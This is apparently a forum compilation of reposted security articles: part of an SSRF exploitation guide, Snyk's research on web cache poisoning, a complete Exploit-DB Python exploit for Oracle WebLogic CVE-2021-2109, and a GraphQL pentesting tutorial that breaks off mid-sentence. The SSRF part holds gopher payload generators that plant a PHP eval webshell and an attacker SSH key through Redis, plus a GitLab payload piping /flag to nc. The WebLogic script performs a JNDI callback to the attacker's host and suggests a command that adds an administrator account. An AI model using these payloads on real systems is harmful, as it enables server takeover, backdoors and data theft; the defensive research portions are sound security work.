phpinfo();?>\n\n" filename="shell.php" path="/var" passwd="" cmd=["flushall", "set 1 {}".format(shell.replace(" ","${IFS}")), "config set dir {}".format(path), "config set dbfilename {}".format(filename), "save" ] if passwd: cmd.insert(0,"AUTH {}".format(passwd)) payload=protocol+ip+":"+port+"/_" def redis_format(arr): CRLF="\r\n" redis_arr = arr.split(" ") cmd="" cmd+="*"+str(len(redis_arr)) for x in redis_arr: cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ") cmd+=CRLF return cmd if __name__=="__main__": for x in cmd: payload += urllib.quote(redis_format(x)) print payload RCE via authorized_keys - Redis Getshell Summary import urllib protocol="gopher://" ip="" port="6379" # shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n" sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n" filename="authorized_keys" path="/root/.ssh/" passwd="" cmd=["flushall", "set 1 {}".format(sshpublic_key.replace(" ","${IFS}")), "config set dir {}".format(path), "config set dbfilename {}".format(filename), "save" ] if passwd: cmd.insert(0,"AUTH {}".format(passwd)) payload=protocol+ip+":"+port+"/_" def redis_format(arr): CRLF="\r\n" redis_arr = arr.split(" ") cmd="" cmd+="*"+str(len(redis_arr)) for x in redis_arr: cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ") cmd+=CRLF return cmd if __name__=="__main__": for x in cmd: payload += urllib.quote(redis_format(x)) print payload RCE on GitLab via Git protocol Great writeup from Liveoverflow here. While this required authenticated access to GitLab to exploit, I am including the payload here as the git protocol may work on the target you are hacking. This payload is for reference. git://[0:0:0:0:0:ffff:]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git   Memcache Commonly bound port: 11211 vBulletin Memcache RCE GitHub Enterprise Memcache RCE Example Gopher payload for Memcache gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a gopher:// ssrftest%0d%0a   Apache Tomcat Commonly bound ports: 80,443 (SSL),8080,8443 (SSL) Effective against Tomcat 6 only: gopher-tomcat-deployer CTF writeup using this technique: From XXE to RCE: Pwn2Win CTF 2018 Writeup   FastCGI Commonly bound ports: 80,443 (SSL) This was taken from here. gopher:// Tools   Gopherus Gopherus - Github Blog post on Gopherus This tool generates Gopher payloads for: MySQL PostgreSQL FastCGI Redis Zabbix Memcache   SSRF Proxy SSRF Proxy SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF). Credits: Thank you to the following people that have contributed to this post: @Rhynorater - Numerous contributions towards this blog post @nnwakelam - Solr Shards SSRF @marcioalm - Tomcat 6 Gopher RCE @vtnahira - OpenTSDB RCE @fransrosen - SSRF canaries concept @theabrahack - RCE via Jenkins Groovy   Sursa: https://github.com/assetnote/blind-ssrf-chains
    • Cache poisoning in popular open source packages Adam GoldschmidtJanuary 18, 2021 Following research done by James Kettle from PortSwigger on web cache poisoning, Snyk’s Security Team decided to deepen our knowledge in this field and to explore these vulnerabilities in the open source domain. We focused our research on the most popular web frameworks both in npm and PyPi, such as Flask (Werkzeug), Bottle, Tornado, and DerbyJS. This blog post provides an introduction to web cache poisoning and demonstrates why open source maintainers should take this issue into account. Furthermore, this blog provides vulnerability examples within well known open source frameworks that were found to be vulnerable during Snyk’s initial research. Cache poisoning explained Web cache poisoning is an attack designed to trick the cache into serving malicious responses to valid requests. It is made possible by including unkeyed parameters in the request, which are saved in the cache but unrepresented in the cache key (hence: unkeyed). To fully understand how the attack works, the concept of web caching should be understood. What is a cache proxy? Cache proxy is a part of a reverse proxy – an intermediate connection between the client and the web server. When a user accesses a website, proxies interpret and respond to requests on behalf of the original server. Proxy caching is one of the features of a reverse proxy, allowing for faster delivery of responses to the user. How does caching work? Caching is storing frequently accessed content in order to speed up subsequent requests to access that content. Cache keys are used in order for the cache to keep references to the responses. Typically, a cache key consists of the values of one or more response headers and a part of the URL. For example, for the following HTTP request, the cache key might be localhost/p/?a=1. GET /p/?a=1 HTTP/1.1 Host: localhost Origin: example Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 When receiving a new request, if the cache is able to find a matching cache key then the saved response will be served instead of generating a new response. As can be seen in the example above, there are headers which can possibly affect the response but are not reflected in the cache key. This means that if we change their values, the response will get saved in the same cache “spot”, but with a different value. The following table shows how three different requests are treated with the cache key defined as $host$query_args: Host Accept-Encoding Query arguments Cache key example.com gzip, deflate ?q=search example.com?q=search example.com identity ?q=search example.com?q=search snyk.io gzip, deflat   snyk.io The first two rows have the same cache key despite having different Accept-Encoding values, therefore they will be cached in the same cache spot. Understanding unkeyed parameters Inputs that aren’t part of the cache key are called unkeyed parameters. This becomes an issue when these parameters can cause malicious behavior in the application. For example, an attacker can turn a reflected XSS into a stored XSS. Let’s take this request for example: GET / HTTP/1.1 Host: somesite.com Origin: <script>alert(1)</script> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Assuming that the Origin parameter is reflected unsanitized and can cause an XSS and is not keyed, every user that visits somesite.com/ will be served the malicious response, until the cached response expires. To learn more about cache poisoning and the possible attack vectors, I recommend reading the following posts by James Kettle: Practical Web Cache Poisoning and Web Cache Entanglement: Novel Pathways to Poisoning. Exploring vulnerabilities within web frameworks A web framework allows the developer to effortlessly generate HTTP responses. From Wikipedia: “Web frameworks provide a standard way to build and deploy web applications on the World Wide Web. Web frameworks aim to automate the overhead associated with common activities performed in web development.”. Usually, these frameworks would contain some security measures in order to make developers’ life even easier. Developers often use web frameworks in conjunction with a cache proxy, such as NGINX or Varnish. This research shows that many of the popular frameworks today are vulnerable to web cache poisoning out of the box, almost regardless of the cache proxy being used—unless explicitly configured to defend against these sort of attacks, which most developers are usually not aware of or do not have sufficient knowledge to do. The following attack vectors were performed on several web frameworks using NGINX and Varnish. GET parameter cloaking in Python and Bottle When the attacker can separate query parameters using a semicolon ;, they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter—such as utm_* parameters, which are usually unkeyed. The W3C recommendation recommends using ampersands as the separators (“Let strings be the result of strictly splitting the string payload on U+0026 AMPERSAND characters (&)”). The most notable finding here was Python’s source code, which contains a method called parse_qsl that parses URL query parameters by a semicolon as well as an ampersand. This method is then used in frameworks, such as Tornado, in order to parse query parameters, which might lead to a web cache poisoning exploitation chain. Bottle (CVE-2020-28473), Tornado (CVE-2020-28476), and Rack were found to be vulnerable. Let’s take a look at an example for this vector, exploiting Bottle. An attacker uses q=cat as the parameter for a search box and overriding it with a different value. Here are the request and the response: GET /search/?q=cat&utm_content=1;q=dog! HTTP/1.1 Host: localhost Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close HTTP/1.1 200 OK Server: nginx/1.19.6 Date: Wed, 06 Jan 2021 19:45:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 26 Connection: close Cache-Control: max-age=10 X-Cache-Date: Wed, 06 Jan 2021 19:45:18 GMT X-Cache: HIT Your search query: dog! Now let’s assume a real user searches for “cat” while the malicious response is still cached: GET /search/?q=cat HTTP/1.1 Host: localhost Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close HTTP/1.1 200 OK Server: nginx/1.19.6 Date: Wed, 06 Jan 2021 19:45:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 26 Connection: close Cache-Control: max-age=10 X-Cache-Date: Wed, 06 Jan 2021 19:45:18 GMT X-Cache: HIT Your search query: dog! The attacker was able to change a legitimate request, replacing the search parameter. The reasoning behind this is that the server sees 3 parameters here: q, utm_content, and then q again. It will override the value of the first q parameter with the last one. On the other hand, the proxy considers this full string: ?q=cat&utm_content=1;q=dog! as the value of utm_content, which is why the cache key would only contain localhost?q=cat. The remediation for this vulnerability should be to only use an ampersand (&) as a query parameter separator unless specified otherwise by the developer. Werkzeug, for example, allows developers to specify custom parameters and take ampersand as the default one. Bottle’s maintainers decided to fix this by not splitting query strings on ;, introduced in version 0.12.19. The Rails framework was also found to be vulnerable to this method (discovered by James Kettle, disclosed to us with the help of Jonathan Leitschuh), but this is not yet fixed at the time of writing. GET body parameters (fat GET) vulnerabilities in Flask and Tornado In some proxies, NGINX for example, it is possible to include body parameters in a GET request. While this is not strictly forbidden in the HTTP RFC (“A payload within a GET request message has no defined semantics; sending a payload body on a GET request might cause some existing implementations to reject the request”), several frameworks were found to include these parameters in built-in methods which are not explicitly used for body parameters.  This might lead to developers trying to fetch GET query parameters, but instead retrieving body parameters. These parameters are not keyed in the cache, which could lead to two problems: Override of parameters An attacker can override GET query parameters with GET body parameters and deliver the cached response to other users.  This issue was found in Tornado when used with NGINX. Since Tornado gives precedence to the body parameters, it was possible to override innocent users requests with malicious ones. Following our example from before, searching for a cat: GET /search/?q=cat HTTP/1.1 Host: localhost Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 6 q=dog! HTTP/1.1 200 OK Server: nginx/1.19.6 Date: Wed, 06 Jan 2021 19:51:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 26 Connection: close Cache-Control: max-age=10 X-Cache-Date: Wed, 06 Jan 2021 19:51:53 GMT X-Cache: HIT Your search query: dog! Now when a user searches for “cat”, this would be the flow: GET /search/?q=cat HTTP/1.1 Host: localhost Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close HTTP/1.1 200 OK Server: nginx/1.19.6 Date: Wed, 06 Jan 2021 19:53:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 26 Connection: close Cache-Control: max-age=10 X-Cache-Date: Wed, 06 Jan 2021 19:51:55 GMT X-Cache: HIT Your search query: dog! Given a case scenario where a reflected cross-site scripting (XSS) vulnerability exists, this could be turned into a stored XSS using this technique which can be delivered to other application users. Injection of extra parameters An attacker can inject additional parameters and deliver the cached response to other users. This is not as severe as the first option, but can nonetheless be critical when chained with the right gadgets (One such example would be altering the request method by using _method in some implementations). This was proven to be possible in Flask. GET /report HTTP/1.1 Host: localhost Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/json Content-Length: 32 {“reason”:”this is an extra field”} This request would cause all subsequent requests of innocent users to contain the extra parameter. Snyk found that multiple frameworks allowed this behavior. However, multiple maintainers contacted by us did not see this as a direct vulnerability in the context of their package. For this reason, Snyk has decided to not issue advisories for these issues.  However, it is possible to provide remediation within the packages themselves by disallowing developers from fetching body data using these ambiguous methods, as many developers use request.params as a convenience, without being aware of the implications. Another solution can be to not give precedence to the body parameters when using these ambiguous methods, as it allows overriding of legitimate query parameters. For example, Werkzeug maintainers decided to fix this by preventing request.valuesfrom using request.form in GET requests, and Tornado’s maintainers went with a different approach of adding a flag to make the parsing of GET request bodies opt-in (which is not released yet). Scope of remediation During this research, we identified numerous cases where the complexity of the multiple attack vectors led to maintainers not always understanding if the criteria of remediation are in the scope of their maintained library or if it should be dealt with at the proxy-level. There are a lot of different scenarios where a cache poisoning might take place, and it is not the web framework’s responsibility to mitigate them all. With that being said, the web framework could help protect against some of them, by implementing additional defense-in-depth measures. It can be argued that proxies should not ignore GET body parameters, as many implementations still use them. They can, however, cache these keys as if they were query parameters. Moreover, the frameworks can prevent developers from using ambiguous methods while still allowing the use of body parameters. The same goes for parameter cloaking—proxies should not use semicolons as separators because it’s not recommended in the RFC, but frameworks can only allow it if the developer explicitly defines it. Minimizing the risk of cache poisoning as developers Individual developers can decrease the threat of being vulnerable by adhering to these points: Be aware of the cache key: If your server splits query arguments using a semicolon, make sure your cache proxy does the same. Furthermore, make sure your cache key contains the necessary headers to prevent attackers from using unkeyed parameters to achieve web cache poisoning. Ignore GET body parameters unless they are needed for the flow of the program, and if so, make sure to only use them when needed. Detect and fix other vulnerabilities within your application: Web cache poisoning is usually used in a chain of exploitation, where an attacker can deliver a malicious response to other users, for example turning a reflected XSS to a stored one. Developers should do their best to secure their applications against these common vulnerabilities even if they seem less severe. Summary To conclude, this research shows that open source frameworks are vulnerable to web cache poisoning attacks almost regardless of the proxy being used (excluding some cases). While it is possible to mitigate these attacks at the proxy-level, many developers are not aware of these attack vectors and are not implementing the required safeguards at the cache/proxy level. The purpose of this blog post was to raise awareness amongst the developer community. While only showing two possible vectors of web cache poisoning, there are many more out there in the wild. Developers should try to follow the points mentioned above and always keep these peculiar vulnerabilities in mind.   Sursa: https://snyk.io/blog/cache-poisoning-in-popular-open-source-packages/
    • # Exploit Title: Oracle WebLogic Server - RCE (Authenticated) # Date: 2021-01-21 # Exploit Author: Photubias # Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html # Vendor Homepage: https://www.oracle.com # Version: WebLogic,,,, (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1) # Tested on: WebLogic with JDK-8u181 on Windows 10 20H2 # CVE: CVE-2021-2109 #!/usr/bin/env python3 ''' Copyright 2021 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name CVE-2021-2109.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be This is a native implementation without requirements, written in Python 3. Works equally well on Windows as Linux (as MacOS, probably ;-) Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar from https://github.com/welk1n/JNDI-Injection-Exploit to be in the same folder ''' import urllib.request, urllib.parse, http.cookiejar, ssl import sys, os, optparse, subprocess, threading, time ## Static vars; change at will, but recommend leaving as is sURL = '' iTimeout = 5 oRun = None ## Ignore unsigned certs, if any because WebLogic is default HTTP ssl._create_default_https_context = ssl._create_unverified_context class runJar(threading.Thread): def __init__(self, sJarFile, sCMD, sAddress): self.stdout = [] self.stderr = '' self.cmd = sCMD self.addr = sAddress self.jarfile = sJarFile self.proc = None threading.Thread.__init__(self) def run(self): self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True) for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line) for line in iter(self.proc.stderr.readline, ''): self.stderr += line def findJNDI(): sCurDir = os.getcwd() sFile = '' for file in os.listdir(sCurDir): if 'JNDI' in file and '.jar' in file: sFile = file print('[+] Found and using ' + sFile) return sFile def findJAVA(bVerbose): try: oProc = subprocess.Popen('java -version', stdout = subprocess.PIPE, stderr = subprocess.STDOUT) except: exit('[-] Error: java not found, needed to run the JAR file\n Please make sure to have "java" in your path.') sResult = list(oProc.stdout)[0].decode() if bVerbose: print('[+] Found Java: ' + sResult) def checkParams(options, args): if args: sHost = args[0] else: sHost = input('[?] Please enter the URL ['+sURL+'] : ') if sHost == '': sHost = sURL if sHost[-1:] == '/': sHost = sHost[:-1] if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost if options.username: sUser = options.username else: sUser = input('[?] Username [weblogic] : ') if sUser == '': sUser = 'weblogic' if options.password: sPass = options.password else: sPass = input('[?] Password [Passw0rd-] : ') if sPass == '': sPass = 'Passw0rd-' if options.command: sCMD = options.command else: sCMD = input('[?] Command to run [calc] : ') if sCMD == '': sCMD = 'calc' if options.listenaddr: sLHOST = options.listenaddr else: sLHOST = input('[?] Local IP to connect back to [] : ') if sLHOST == '': sLHOST = '' if options.verbose: bVerbose = True else: bVerbose = False return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) def startListener(sJarFile, sCMD, sAddress, bVerbose): global oRun oRun = runJar(sJarFile, sCMD, sAddress) oRun.start() print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint') oRun.join(3) if not oRun.stderr == '': exit('[-] Error starting Java listener:\n' + oRun.stderr) bThisLine=False if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180') for line in oRun.stdout: if bThisLine: return line.split('/')[3].replace('\n','') if 'JDK 1.8' in line: bThisLine = True def endIt(): global oRun print('[+] Closing threads') if oRun: oRun.proc.terminate() exit(0) def main(): usage = ( 'usage: %prog [options] URL \n' ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n' ' in the current working folder\n' 'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n' 'Only works when hacker is reachable via an IPv4 address\n' 'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n' 'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l\n' 'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add' ) parser = optparse.OptionParser(usage=usage) parser.add_option('--username', '-u', dest='username') parser.add_option('--password', '-p', dest='password') parser.add_option('--command', '-c', dest='command') parser.add_option('--listen', '-l', dest='listenaddr') parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False) ## Get or ask for the vars (options, args) = parser.parse_args() (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args) ## Verify Java and JAR file sJarFile = findJNDI() findJAVA(bVerbose) ## Keep track of cookies between requests cj = http.cookiejar.CookieJar() oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) print('[+] Verifying reachability') ## Get the cookie oRequest = urllib.request.Request(url = sHost + '/console/') oResponse = oOpener.open(oRequest, timeout = iTimeout) for c in cj: if c.name == 'ADMINCONSOLESESSION': if bVerbose: print('[+] Got cookie "' + c.value + '"') ## Logging in lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'} lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'} oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders) oResponse = oOpener.open(oRequest, timeout = iTimeout) sResult = oResponse.read().decode(errors='ignore').split('\r\n') bSuccess = True for line in sResult: if 'Authentication Denied' in line: bSuccess = False if bSuccess: print('[+] Succesfully logged in!\n') else: exit('[-] Authentication Denied') ## Launch the LDAP listener and retrieve the random endpoint value sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose) if bVerbose: print('[+] Got Java value: ' + sRandom) ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "" print('\n[+] Firing exploit now, hold on') ##;10:1389/5r5mu7;AdminServer-) sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3] sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)' if bVerbose: print('[!] Using URL ' + sFullUrl) oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders) oResponse = oOpener.open(oRequest, timeout = iTimeout) time.sleep(5) bExploitWorked = False for line in oRun.stdout: if 'Log a request' in line: bExploitWorked = True if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim') if not bExploitWorked: print('[-] Exploit failed, victim likely patched') else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)') if bVerbose: print(oRun.stderr) endIt() if __name__ == "__main__": try: main() except KeyboardInterrupt: endIt()   Sursa: https://www.exploit-db.com/exploits/49461
    • Pentest applications with GraphQL 6 min by proger 303views   Recently GraphQL is gaining more and more popularity, and with it the interest of information security specialists is growing. Technology is used by companies such as: Facebook, Twitter, PayPal, Github, and others, which means it's time to figure out how to test this API. In this article we will talk about the principles of this query language and directions for testing penetration of applications with GraphQL.   Why do you need to know GraphQL? This query language is actively developing and more and more companies find it a practical application. As part of the Bug Bounty programs, the popularity of this language is also growing, interesting examples can be found here, here and here. Training Test site where you will find most of the examples given in the article. A list with applications that you can also use to study. To interact with various APIs, it is better to use IDE for GraphQL: Graphql-playground Altair Insomnia   We recommend the latest IDE: Insomnia has a convenient and simple interface, there are many settings and autocompletion of the query fields. Before going directly to the general methods of analyzing security applications with GraphQL, let us recall the basic concepts.   What is GraphQL?   GraphQL is a query language for APIs designed to provide a more efficient, powerful, and flexible REST alternative. It is based on declarative data sampling, that is, the client can specify exactly what data he needs from the API. Instead of multiple API endpoints (REST), GraphQL represents a single endpoint that provides the client with the requested data. The main differences between REST and GraphQL   Usually in the REST API you need to get information from different endpoints. In GraphQL, in order to get the same data, you need to make one query indicating the data you want to receive. REST API provides the information that the developer provides in the API, that is, if you need to get more or less information than the API suggests, then additional actions will be needed. Again, GraphQL provides exactly the requested information. A useful addition would be that GraphQL has a schema that describes how and what data a client can receive. Types of requests     There are 3 main types of queries in GraphQL: Query Mutation Description Query Query queries are used to get / read data in the schema. An example of such a request: query {   allPersons {     name   } }   In the request we indicate that we want to get the names of all users. In addition to the name, we can specify other fields: age, id, posts etc. To find out which fields we can get, you need to press Ctrl + Space. In this example, we pass the parameter with which the application returns the first two entries: query {   allPersons (first: 2) {     name   } } Mutation If the query type is needed for reading data, then the mutation type is needed for writing, deleting and modifying data in GraphQL. An example of such a request: mutation {   createPerson (name: "Bob", age: 37) {     id     name     age   } }   In this request, we create a user with the name Bob and age 37 (these parameters are passed as arguments), in the attachment (curly brackets) we indicate what data we want to get from the server after creating the user. This is necessary in order to understand that the request was executed successfully, as well as to obtain data that the server generates independently, such as id. Subscription Another type of query in GraphQL is subscription. It is needed to notify users of any changes in the system. It works like this: the client subscribes to an event, after which a connection is established with the server (usually via WebSocket), and when this event occurs, the server sends a notification to the client via the established connection. Example: subscription {   newPerson {     name     age     id   } }   When a new Person is created, the server will send information to the client. The presence of subscription queries in schemas is less common than query and mutation. It is worth noting that all the possibilities for query, mutation and subscription are created and configured by the developer of a specific API. Optional   In practice, developers often use alias and OperationName in queries for clarity. Alias GraphQL for queries provides the possibility of alias, which can facilitate the understanding of what exactly the client requests. Suppose we have a query of the form: {   Person (id: 123) {     age   } }   which will display the username with id 123. Let the name of this user be Vasya. In order not to wrestle with the next time, which will lead this request, you can do this: {   Vasya: Person (id: 123) {     age   } } OperationName In addition to alias, GraphN uses OperationName: query gettingAllPersons {   allPersons {     name     age   } }   OperationName is needed to clarify what the query is doing. Pentest   After we have dealt with the basics, go directly to Pentest. How to understand that the application uses GraphQL? Here is an example query in which there is a GraphQL query: POST / simple / v1 / cjp70ml3o9tpa0184rtqs8tmu / HTTP / 1.1 Host: api.graph.cool User-Agent: Mozilla / 5.0 (X11; Ubuntu; Linux x86_64; rv: 65.0) Gecko / 20100101 Firefox / 65.0 Accept: * / * Accept-Language: ru-RU, ru; q = 0.8, en-US; q = 0.5, en; q = 0.3 Accept-Encoding: gzip, deflate Referer: https://api.graph.cool/simple/v1/cjp70ml3o9tpa0184rtqs8tmu/ content-type: application / json Origin: https://api.graph.cool Content-Length: 139 Connection: close {"operationName": null, "variables": {}, "query": "{ n __schema { n mutationType { n fields { n name n} n} n} n} n" }   Some parameters by which you can understand that GraphQL is in front of you, and not something else: There are words in the request body: __schema, fields, operationName, mutation, etc .; In the request body there are many characters " n". As practice shows, they can be removed to make it easier to read the request; often the way to send a request to the server is: ⁄graphql   Great, found and identified. But where to insert a quote How to find out what we need to work with? Introspection will come to the rescue. Introspection   GraphQL provides an introspection scheme, i.e. schema with a description of the data that we can get. Thanks to this, we can find out what requests exist, what arguments can / should be passed to them and much more. Note that in some cases, developers intentionally do not allow the possibility of introspection of their application. Nevertheless, the main majority still leaves such an opportunity. Consider the basic query examples. Example 1. Getting all kinds of requests query {   __schema {     types {       name       fields {         name       }     }   } }   We form query query, we specify that we want to receive data on __schema, and in it types, their names and fields. In GraphQL there are utility variable names: __schema, __typename, __type In the answer we will receive all types of requests, their names and fields that exist in the schema. Example 2. Getting fields for a specific type of query (query, mutation, description) query {   __schema {     queryType {       fields {         name         args {           name         }       }     }   } }   The answer to this query will be all possible queries that we can execute to the schema to get data (query type), and possible / necessary arguments for them. For some queries, the argument (s) is required. If you execute such a request without specifying a required argument, the server should display a message with an error that you need to specify it. Instead of queryType, we can substitute mutationType and subscriptionType to get all possible queries on mutations and subscriptions, respectively. Example 3. Getting information about a specific type of request query {   __type (name: "Person") {     fields {       name     }   } }   Thanks to this request, we get all the fields for the Person type. As an argument, instead of Person, we can pass any other request names. Now that we can deal with the general structure of the application under test, let's determine what we are looking for. Information disclosure Most often, an application using GraphQL consists of many fields and types of queries, and, as many know, the harder and larger the application, the harder it is to configure and monitor its security. That is why with careful introspection you can find something interesting, for example: the user's full name, their phone numbers and other critical data. Therefore, if you want to find something similar, we recommend checking all possible fields and arguments of the application. So within the framework of pentest, user data was found in one of the applications: name, phone number, date of birth, some map data, etc. Example: query {   User (id: 1) {     name     birth     phone     email     password   } }   Going through the id values, we will be able to get information about other users (or maybe not, if everything is configured correctly). Injections Needless to say that almost everywhere where there is a work with a large amount of data, there are also databases? And where there is a database – there may be SQL-injections, NoSQL-injections and other types of injections. Example: mutation {   createPerson (name: "Vasya '- +") {     name   } }   Here is an elementary SQL injection in the query argument. Authorization bypass Suppose we can create users: mutation {   createPerson (username: "Vasya", password: "Qwerty1") {   } }   Assuming that there is a certain isAdmin parameter in the handler on the server, we can send a request of the form: mutation {   createPerson (username: "Vasya", password: "Qwerty1", isAdmin: True) {   } }   And make the user Vasya administrator. DoS   In addition to the stated convenience, GraphQL has its own security flaws. Consider an example: query {   Person {     posts {       author {         posts {           author {             posts {               author ...             }           }         }       }     }   } }   As you can see, we have created a looped subquery. With a large number of such 